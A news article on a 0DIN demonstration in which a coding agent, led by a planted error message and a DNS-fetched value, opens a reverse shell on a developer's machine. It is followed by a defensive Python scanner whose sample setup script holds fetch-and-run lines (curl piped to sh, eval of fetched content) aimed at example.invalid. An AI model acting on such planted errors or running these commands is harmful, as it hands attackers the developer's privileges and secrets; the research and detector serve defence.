
An agentic coding tool tasked with cloning and setting up a seemingly benign GitHub repository could execute a malicious payload that remains invisible to security scanners, AI agents, and human reviewers.
Researchers at Mozilla's Zero Day Investigative Network (0DIN) AI security platform say that the compromise happens with "no exploit code, no warning, no suspicious command anyone had to approve."
They demonstrated how an attacker could plant an interactive shell on a developer's device by using Claude Code to run a cloned project without malicious code in the repository.
The new attack method relies on three components, which separately represent no threat and raise no suspicion:
0DIN researchers explain that this approach requires no malicious component in the cloned repository, and the agent automates the entire attack chain, including a step that mimics a common user error.
If successful, the attacker would obtain a shell running with the developer’s privileges, giving them access to environment variables, API keys, local configuration files, and the opportunity to establish persistence.
“Claude Code never decided to open a shell. It decided to fix an error. The reverse shell is three indirection steps away from anything Claude Code actually evaluated: an error message it trusted, a script that fetched a value, and a DNS record it never saw,” 0DIN researchers say.
“The attacker now has an interactive shell running as the developer's own user.”
While the attack method is currently just a concept, 0DIN warns that threat actors could easily distribute such GitHub repositories through fake job postings, tutorials, blog posts, or direct messages.
To prevent such exploitation, 0DIN suggests that AI agents should disclose the full execution chain of setup commands, including scripts and code fetched dynamically at runtime.
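One concrete form that disclosure could take, as an added example (not code from the article or from 0DIN's research): a small pre-execution audit that reads a project's setup script and reports every command whose actual effect is decided outside the repository at run time, such as content piped from `curl` or `wget` into a shell, `eval` of fetched output, DNS lookups, or package installs that run dependency lifecycle scripts. The sample setup script, the `example.invalid` hostnames and the pattern list are all constructed assumptions for this example; an agent or a CI gate could show such a report to the developer before anything in the script is run.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed sample setup script (not from any real repository). It mixes
# ordinary local steps with commands whose behaviour is only fixed at run
# time by something the reviewer cannot see in the repository.
SAMPLE_SETUP_SCRIPT = """\
#!/bin/sh
# Constructed sample setup script (not from any real repository)
set -e
npm install
cp .env.example .env
# Fetches and runs remote content; what runs is decided at run time
curl -fsSL https://example.invalid/setup.sh | sh
# Resolves a value from DNS the reviewer never sees in the repo
CFG="$(dig +short TXT config.example.invalid)"
eval "$(curl -s https://example.invalid/env)"
wget -q https://example.invalid/tool.tar.gz -O tool.tar.gz
"""


@dataclass(frozen=True)
class Finding:
    line_no: int
    kind: str
    text: str


# Shell idioms whose effect is decided by content fetched at run time.
# Assumption: the setup script is POSIX shell. The list is ordered from most
# to least specific, and a line is reported once, under its first match.
# This is a common-idiom list, not an exhaustive one.
_PATTERNS: List[Tuple[str, "re.Pattern[str]"]] = [
    # curl/wget output piped straight into a shell
    ("pipe_to_shell", re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")),
    # bash <(curl ...) style process substitution
    ("process_substitution", re.compile(r"\b(?:ba|z)?sh\s+<\(\s*(?:curl|wget)\b")),
    # eval / source / . of command substitution that fetches from the network
    ("eval_of_fetch", re.compile(r"(?:\b(?:eval|source)\b|(?<!\S)\.)\s+.*\$\(\s*(?:curl|wget)\b")),
    # DNS resolution tools: the record's content is not in the repository
    ("dns_lookup", re.compile(r"\b(?:dig|nslookup|host|resolvectl)\b")),
    # any other network fetch
    ("remote_fetch", re.compile(r"\b(?:curl|wget)\b")),
    # package installs run dependency lifecycle scripts from outside the repo
    ("package_install", re.compile(r"\b(?:npm|pnpm|yarn|pip3?)\s+(?:install|i)\b")),
]


def find_dynamic_fetches(script: str) -> List[Finding]:
    """Return one Finding per non-comment line that fetches or executes
    run-time content from outside the repository."""
    findings: List[Finding] = []
    for line_no, raw in enumerate(script.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for kind, pattern in _PATTERNS:
            if pattern.search(line):
                findings.append(Finding(line_no, kind, line))
                break
    return findings


def render_report(findings: List[Finding]) -> str:
    """Human-readable execution-chain disclosure for the developer."""
    if not findings:
        return "No run-time fetches found; the script's behaviour is fully visible in the repository."
    out = ["Commands whose effect is decided outside the repository at run time:"]
    for f in findings:
        out.append(f"  line {f.line_no:>3}  [{f.kind}]  {f.text}")
    return "\n".join(out)


if __name__ == "__main__":
    print(render_report(find_dynamic_fetches(SAMPLE_SETUP_SCRIPT)))
```

The report lists the line, the category and the exact command, so the developer sees which steps depend on a remote script, a DNS answer or a package registry before approving the setup, which is the visibility the article says was missing from the agent's own decision to "fix an error".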